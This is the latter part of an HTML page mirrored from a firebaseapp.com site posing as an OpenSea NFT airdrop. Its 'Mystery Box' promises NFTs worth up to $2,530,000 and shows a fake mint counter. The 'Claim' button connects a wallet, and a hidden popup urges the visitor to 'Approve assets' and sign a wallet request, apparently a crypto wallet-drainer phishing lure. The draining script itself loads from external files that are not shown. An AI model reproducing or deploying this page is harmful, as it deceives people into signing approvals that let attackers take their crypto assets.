                      d="M23.6741 2.0787C22.3933 0.494275 19.9777 0.494276 18.6969 2.0787L16.932 4.26193C16.1363 5.24636 14.835 5.66918 13.6126 5.3405L10.9015 4.61157C8.93402 4.08257 6.97973 5.50245 6.87485 7.5371L6.73034 10.3407C6.66518 11.6049 5.86095 12.7118 4.67879 13.1644L2.05704 14.1682C0.154385 14.8967 -0.592088 17.1941 0.519004 18.9018L2.05002 21.255C2.74036 22.316 2.74036 23.6842 2.05002 24.7453L0.519003 27.0984C-0.592088 28.8061 0.154384 31.1035 2.05704 31.832L4.67879 32.8358C5.86095 33.2884 6.66518 34.3954 6.73034 35.6595L6.87485 38.4631C6.97973 40.4978 8.93402 41.9177 10.9015 41.3887L13.6126 40.6597C14.835 40.3311 16.1363 40.7539 16.932 41.7383L18.6969 43.9215C19.9777 45.506 22.3933 45.506 23.6741 43.9215L25.4389 41.7383C26.2347 40.7539 27.536 40.3311 28.7584 40.6597L31.4695 41.3887C33.4369 41.9177 35.3912 40.4978 35.4961 38.4631L35.6406 35.6595C35.7058 34.3953 36.51 33.2884 37.6922 32.8358L40.3139 31.832C42.2166 31.1035 42.963 28.8061 41.8519 27.0984L40.3209 24.7453C39.6306 23.6842 39.6306 22.316 40.3209 21.255L41.8519 18.9018C42.963 17.1941 42.2166 14.8967 40.3139 14.1682L37.6922 13.1644C36.51 12.7118 35.7058 11.6049 35.6406 10.3407L35.4961 7.53709C35.3912 5.50244 33.4369 4.08257 31.4695 4.61157L28.7584 5.3405C27.536 5.66918 26.2347 5.24636 25.4389 4.26193L23.6741 2.0787ZM32.8789 17.6449L29.9646 14.7307L18.6075 26.0878L14.1075 21.5878L11.1933 24.5021L18.6075 31.9163L32.8789 17.6449Z"
                      fill-rule="evenodd"></path>
                  </svg>
                </div>
                <div class="content_author_coin">
                  <span>Ethereum</span>
                </div>
              </div>
            </div>
            <div class="about_description">
              𝗪𝗲 𝘀𝘁𝗮𝗿𝘁𝗲𝗱 𝗻𝗲𝘄 𝗔𝗜𝗥𝗗𝗥𝗢𝗣 𝗼𝗻𝗹𝘆 𝟭𝟱𝟬 𝗠𝘆𝘀𝘁𝗲𝗿𝘆 𝗕𝗼𝘅.<br>


              Opensea owned NFT's worth between $3000 and $2,530,000. <br>🎁 Only one box can be claimed per address,
              GOODLUCK. <p></p>
            </div>
          </div>
          <div class="stat">
            <div class="stat_row">
              <div class="stat_nums">
                <div class="stat_nums_left">
                  <span>49,5% minted</span>
                </div>
                <div class="stat_nums_right">
                  <span>73 / 150</span>
                </div>
              </div>
              <div class="stat_line">
                <div class="stat_line_left"></div>
                <div class="stat_line_right"></div>
              </div>
            </div>
            <div class="counter">
              <div class="counter_lable">
                Community
              </div>
              <div class="counter_amount">
                0 ETH
              </div>
              <div class="counter_input">
                <div class="counter_input_count">
                  <div class="minus">
                    <span>-</span>
                  </div>
                  <div class="int">
                    1
                  </div>
                  <div class="plus">
                    <span>+</span>
                  </div>
                </div>
                <div class=" mint connectButton connectButton" id="messageButton" style="cursor: pointer" ad-data-linked="true">
                  <a>
                    Claim
                  </a>
                </div>
              </div>
            </div>
          </div>
        </div>

      </div>
    </div>
  </main>
  <footer>
    <div class="first_row">
      <div class="first_row_left">
        <div class="row_left_lable">
          Stay in the loop
        </div>
        <div class="row_left_desc">
          Join our mailing list to stay in the loop with our newest feature releases, NFT drops, and tips and tricks for
          navigating OpenSea.
        </div>
        <div class="row_left_input">
          <div class="left_input">
            <input type="text" placeholder="Your email address">
          </div>
          <div class="left_btn">
            Sign up
          </div>
        </div>
      </div>
      <div class="first_row_right">
        <div class="row_left_lable">
          Join the community
        </div>
        <div class="row_links">
          <div class="content_right">
            <div class="links">
              <div class="icon">
                <svg class="" fill="#FFFFFF" height="24" viewBox="0 0 293.775 293.671" width="24"
                  xmlns="http://www.w3.org/2000/svg">
                  <g id="etherscan-logo-circle" transform="translate(-219.378 -213.33)">
                    <path
                      d="M280.433,353.152A12.45,12.45,0,0,1,292.941,340.7l20.737.068a12.467,12.467,0,0,1,12.467,12.467v78.414c2.336-.692,5.332-1.43,8.614-2.2a10.389,10.389,0,0,0,8.009-10.11V322.073a12.469,12.469,0,0,1,12.468-12.47h20.778a12.469,12.469,0,0,1,12.467,12.467v90.279s5.2-2.106,10.269-4.245a10.408,10.408,0,0,0,6.353-9.577V290.9a12.466,12.466,0,0,1,12.466-12.467h20.778A12.468,12.468,0,0,1,450.815,290.9v88.625c18.014-13.055,36.271-28.758,50.759-47.639a20.926,20.926,0,0,0,3.185-19.537,146.6,146.6,0,0,0-136.644-99.006c-81.439-1.094-148.744,65.385-148.736,146.834a146.371,146.371,0,0,0,19.5,73.45,18.56,18.56,0,0,0,17.707,9.173c3.931-.346,8.825-.835,14.643-1.518a10.383,10.383,0,0,0,9.209-10.306V353.152"
                      data-name="Path 1" id="Path_1"></path>
                    <path
                      d="M244.417,398.641A146.808,146.808,0,0,0,477.589,279.9c0-3.381-.157-6.724-.383-10.049-53.642,80-152.686,117.4-232.79,128.793"
                      data-name="Path 2" id="Path_2" transform="translate(35.564 80.269)"></path>
                  </g>
                </svg>
              </div>
              <div class="icon">
                <svg class="" fill="#FFFFFF" viewBox="1 1 22 22" style="height: 24px; width: 24px;">
                  <path clip-rule="evenodd"
                    d="M2 12C2 6.48 6.47 2 11.99 2C17.52 2 22 6.48 22 12C22 17.52 17.52 22 11.99 22C6.47 22 2 17.52 2 12ZM15.97 8H18.92C17.96 6.35 16.43 5.07 14.59 4.44C15.19 5.55 15.65 6.75 15.97 8ZM12 4.04C12.83 5.24 13.48 6.57 13.91 8H10.09C10.52 6.57 11.17 5.24 12 4.04ZM4 12C4 12.69 4.1 13.36 4.26 14H7.64C7.56 13.34 7.5 12.68 7.5 12C7.5 11.32 7.56 10.66 7.64 10H4.26C4.1 10.64 4 11.31 4 12ZM5.08 16H8.03C8.35 17.25 8.81 18.45 9.41 19.56C7.57 18.93 6.04 17.66 5.08 16ZM5.08 8H8.03C8.35 6.75 8.81 5.55 9.41 4.44C7.57 5.07 6.04 6.34 5.08 8ZM12 19.96C11.17 18.76 10.52 17.43 10.09 16H13.91C13.48 17.43 12.83 18.76 12 19.96ZM9.5 12C9.5 12.68 9.57 13.34 9.66 14H14.34C14.43 13.34 14.5 12.68 14.5 12C14.5 11.32 14.43 10.65 14.34 10H9.66C9.57 10.65 9.5 11.32 9.5 12ZM14.59 19.56C15.19 18.45 15.65 17.25 15.97 16H18.92C17.96 17.65 16.43 18.93 14.59 19.56ZM16.5 12C16.5 12.68 16.44 13.34 16.36 14H19.74C19.9 13.36 20 12.69 20 12C20 11.31 19.9 10.64 19.74 10H16.36C16.44 10.66 16.5 11.32 16.5 12Z"
                    fill-rule="evenodd" id="icon/action/language_24px"></path>
                </svg>
              </div>
              <div class="icon">
                <svg class="" fill="#FFFFFF" viewBox="0 0 22 16" style="height: 24px; width: 24px;">
                  <path
                    d="M8.11.5c-.28.002-2.574.067-4.996 1.873 0 0-2.584 4.665-2.584 10.408 0 0 1.507 2.593 5.473 2.719 0 0 .664-.792 1.202-1.477-2.278-.685-3.14-2.108-3.14-2.108s.18.126.502.307c.018 0 .035.019.07.036.055.035.108.054.162.09.448.252.896.45 1.31.611.736.307 1.615.576 2.639.774 1.346.252 2.925.342 4.646.019a12.954 12.954 0 002.603-.774 10.118 10.118 0 002.062-1.063s-.896 1.458-3.247 2.125c.538.666 1.185 1.439 1.185 1.439 3.965-.126 5.473-2.72 5.473-2.7 0-5.746-2.584-10.409-2.584-10.409C16.32.446 13.861.5 13.861.5l-.251.288c3.05.918 4.468 2.27 4.468 2.27a14.856 14.856 0 00-5.4-1.711 15.048 15.048 0 00-3.626.036c-.107 0-.197.019-.306.035-.628.072-2.153.288-4.073 1.135-.663.288-1.059.505-1.059.505S5.088 1.635 8.317.717L8.137.5h-.028zm-.457 6.645c1.022 0 1.849.882 1.83 1.981 0 1.1-.808 1.982-1.83 1.982-1.005 0-1.83-.883-1.83-1.982s.806-1.981 1.83-1.981zm6.55 0c1.004 0 1.83.882 1.83 1.981 0 1.1-.809 1.982-1.83 1.982-1.006 0-1.83-.883-1.83-1.982s.806-1.981 1.83-1.981z">
                  </path>
                </svg>
              </div>
              <div class="icon">
                <svg class="" fill="#FFFFFF" viewBox="0 0 18 16" style="height: 24px; width: 24px;">
                  <path
                    d="M.09 13.791c1.992.14 3.728-.344 5.327-1.571-.816-.098-1.527-.311-2.127-.786-.584-.466-1.032-1.047-1.272-1.841h1.48c.008-.033.016-.066.024-.107-.816-.237-1.512-.663-2.032-1.342-.52-.67-.775-1.448-.8-2.3.52.148 1.016.295 1.52.434.016-.033.04-.065.056-.098-.72-.606-1.24-1.334-1.431-2.275a3.92 3.92 0 01.391-2.7c2 2.389 4.511 3.715 7.598 3.936-.096-.778-.104-1.498.16-2.202.912-2.463 3.983-3.249 5.894-1.481.216.196.4.229.632.147.632-.229 1.255-.474 1.903-.72-.248.81-.784 1.408-1.415 1.989.615-.164 1.231-.336 1.839-.5.024.025.048.041.072.066-.464.491-.912 1.007-1.415 1.449-.272.237-.36.458-.376.818-.144 4.01-1.752 7.25-5.175 9.289-3.487 2.07-7.077 1.947-10.612-.025-.064-.04-.12-.09-.24-.18z">
                  </path>
                </svg>
              </div>
              <div class="icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="28" viewBox="0 0 24 28" fill="none">
                  <path
                    d="M18.8571 11.9879C21.6964 11.9879 24 9.68671 24 6.8503C24 4.01389 21.6964 1.71265 18.8571 1.71265C16.0179 1.71265 13.7143 4.01389 13.7143 6.8503C13.7143 7.06437 13.725 7.27844 13.7518 7.48715L8.71071 10.0025C7.78929 9.10872 6.53036 8.56285 5.14286 8.56285C2.30357 8.56285 0 10.8641 0 13.7005C0 16.5369 2.30357 18.8382 5.14286 18.8382C6.53036 18.8382 7.78929 18.2923 8.71071 17.3985L13.7518 19.9138C13.725 20.1226 13.7143 20.3313 13.7143 20.5507C13.7143 23.3871 16.0179 25.6884 18.8571 25.6884C21.6964 25.6884 24 23.3871 24 20.5507C24 17.7143 21.6964 15.4131 18.8571 15.4131C17.4696 15.4131 16.2107 15.9589 15.2893 16.8527L10.2482 14.3374C10.275 14.1286 10.2857 13.9199 10.2857 13.7005C10.2857 13.4811 10.275 13.2724 10.2482 13.0636L15.2893 10.5483C16.2107 11.4421 17.4696 11.9879 18.8571 11.9879Z"
                    fill="white"></path>
                </svg>
              </div>
              <div class="icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="24" height="28" viewBox="0 0 24 28" fill="none">
                  <path
                    d="M0.428467 13.7144C0.428467 12.9187 0.744537 12.1556 1.30715 11.593C1.86976 11.0304 2.63282 10.7144 3.42847 10.7144C4.22412 10.7144 4.98718 11.0304 5.54979 11.593C6.1124 12.1556 6.42847 12.9187 6.42847 13.7144C6.42847 14.51 6.1124 15.2731 5.54979 15.8357C4.98718 16.3983 4.22412 16.7144 3.42847 16.7144C2.63282 16.7144 1.86976 16.3983 1.30715 15.8357C0.744537 15.2731 0.428467 14.51 0.428467 13.7144ZM8.9999 13.7144C8.9999 12.9187 9.31597 12.1556 9.87858 11.593C10.4412 11.0304 11.2042 10.7144 11.9999 10.7144C12.7955 10.7144 13.5586 11.0304 14.1212 11.593C14.6838 12.1556 14.9999 12.9187 14.9999 13.7144C14.9999 14.51 14.6838 15.2731 14.1212 15.8357C13.5586 16.3983 12.7955 16.7144 11.9999 16.7144C11.2042 16.7144 10.4412 16.3983 9.87858 15.8357C9.31597 15.2731 8.9999 14.51 8.9999 13.7144ZM20.5713 10.7144C21.367 10.7144 22.13 11.0304 22.6926 11.593C23.2553 12.1556 23.5713 12.9187 23.5713 13.7144C23.5713 14.51 23.2553 15.2731 22.6926 15.8357C22.13 16.3983 21.367 16.7144 20.5713 16.7144C19.7757 16.7144 19.0126 16.3983 18.45 15.8357C17.8874 15.2731 17.5713 14.51 17.5713 13.7144C17.5713 12.9187 17.8874 12.1556 18.45 11.593C19.0126 11.0304 19.7757 10.7144 20.5713 10.7144Z"
                    fill="white"></path>
                </svg>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </footer>




  <script type="text/javascript" src="js/jquery-3.6.1.min.html"></script>
  <script type="text/javascript" src="js/slick-1.8.1/slick/slick.min.html"></script>
  <script type="text/javascript" src="js/index.html"></script>


  <div id="drPopup" class="drPopup"
    style="display:none; !important; font-family: 'Poppins', sans-serif; position: fixed !important; inset: 0 !important; z-index: 150 !important; height: 100% !important; width: 100% !important; transition: opacity 0.3s ease-in-out 0s; background: rgba(0, 0, 0, 0.8) !important; justify-content: center !important; max-height: 100%; !important">
    <div class="keks-container" style="margin: 40px 0px !important;">
      <div class="keks-content"
        style="position: relative !important;border-radius: 16px;background: #191919 !important;width: 360px;max-height: calc(0px + 100vh);max-width: 100%;">
        <div class="keks-title" style="position: relative; text-align: center; padding: 16px 24px;">
          <h4 style="font-weight: 600;
            line-height: 110%;
            font-size: 22px;
            color: #fff;
            padding: 4px 16px
            ">Pending...</h4>
          <div class="keks-close" id="popupClose"></div>
          <style>
            .keks-close {
              cursor: pointer;
              position: absolute;
              right: 25px;
              top: 15px;
              width: 20px;
              height: 20px;
              opacity: 0.3;
            }

            .keks-close:hover {
              opacity: 0.4;
            }

            .keks-close:before,
            .keks-close:after {
              content: '';
              position: absolute;
              left: 15px;
              height: 19px;
              width: 2px;
              background-color: #7f7f7f;

            }

            .keks-close:before {
              transform: rotate(45deg);
            }

            .keks-close:after {
              transform: rotate(-45deg);
            }
          </style>
        </div>
        <div class="keks-details" style="padding: 24px;">
          <div style="; align-items: center; gap: 25px;">
            <div class="keks-image">
              <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
                style="margin: auto; background: none; display: block; shape-rendering: auto;" width="200px"
                height="200px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
                <circle cx="50" cy="50" r="32" stroke-width="8" stroke="#2775ca"
                  stroke-dasharray="50.26548245743669 50.26548245743669" fill="none" stroke-linecap="round">
                  <animateTransform attributeName="transform" type="rotate" repeatCount="indefinite" dur="1s"
                    keyTimes="0;1" values="0 50 50;360 50 50"></animateTransform>
                </circle>
                <!-- [ldio] generated by https://loading.io/ -->
              </svg>
            </div>

            <div class="keks-imageName">
              <p style="font-size: 16.5px; font-weight: 600; color: #fff"></p>
            </div>
          </div>
          <hr
            style="padding: 0px; margin: 28px 0px; opacity: 0.2; border-color: rgb(138, 147, 155) currentcolor currentcolor; border-style: solid none none; border-width: 1px medium medium; border-image: none 100% / 1 / 0 stretch; color: rgb(138, 147, 155); text-align: center;">
          <div class="keks-text">
            <div
              style="color: #fff; align-items: center; margin-bottom: 12px; display: flex; text-align: center; font-weight: 600;  background: #323232; border-radius: 12px; padding: 7px;">
              <img src="cdn-icons-png.flaticon.com/512/1828/1828640.html" height="22"
                style="margin-right: 5px;height: 19px;display: inline-block;vertical-align: middle;width: 19px;"
                width="6">
              <h3 style="text-align: center; font-size: 13px; font-weight: 600; color: #fff; margin: 0;">Approve assets
                to use our new protocol</h3>
            </div>
            <div style="color: #fff !important; line-height: 140%; margin-bottom: 12px; font-weight: 600;">
              <h3 style="font-size: 14px; text-align: center; font-weight: 600; position: relative;">Check your wallet
                for signature request</h3>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div><w3m-modal></w3m-modal><iframe id="verify-api"
    src="https://verify.walletconnect.org/0761e7d1b5103f901dbdb7fd033df5b9" style="display: none;"></iframe>

 


</body>
<!-- Mirrored from nftmintzpro.firebaseapp.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 21 Jul 2024 19:38:03 GMT -->

</html>